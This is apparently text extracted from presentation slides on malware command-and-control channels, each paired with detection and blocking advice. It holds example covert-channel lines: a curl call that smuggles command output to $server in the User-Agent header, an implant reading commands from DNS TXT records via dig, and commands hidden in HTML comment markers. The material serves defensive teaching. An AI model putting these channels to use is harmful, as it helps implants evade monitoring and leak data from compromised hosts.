Negotiation-based, low latency ◦ Good for live interaction ◦ i.e. TCP, SSH, RDP • Indirect = Connect to intermediate server ◦ Stealthy, high latency ◦ Good for asynchronous commands / responses ◦ i.e. P2P, social media posts, HTML comments
Give me your information Start_Interaction = I want a command session Transfer_File = Send a particular file Execute_Command = Run and send the results
process ◦ Firewall = IP + port access lists • Gateway, Routing: ◦ DNS sinkhole = blacklist suspicious domains ◦ IDS = drop connections with scary data ◦ Protocol filtering = inspect packets
and replies curl $server -A “AppleWebKit/531.($command)” Detection: Look for uncommon UserAgents Blocking: Use a web proxy to standardize outgoing UAs (i.e. fake_user_agent in squid)
record Implant parses DNS TXT record for domain dig $domain txt Detect: Log DNS queries and investigate odd ones Blocking: Run your own DNS, never ask for authoritative records, only cache from trusted sources
from between markers <!-->marker $command marker<--> Detection: very difficult Blocking: Use a web proxy to filter incoming comments (i.e. ProxyHTMLStripComments On in squid)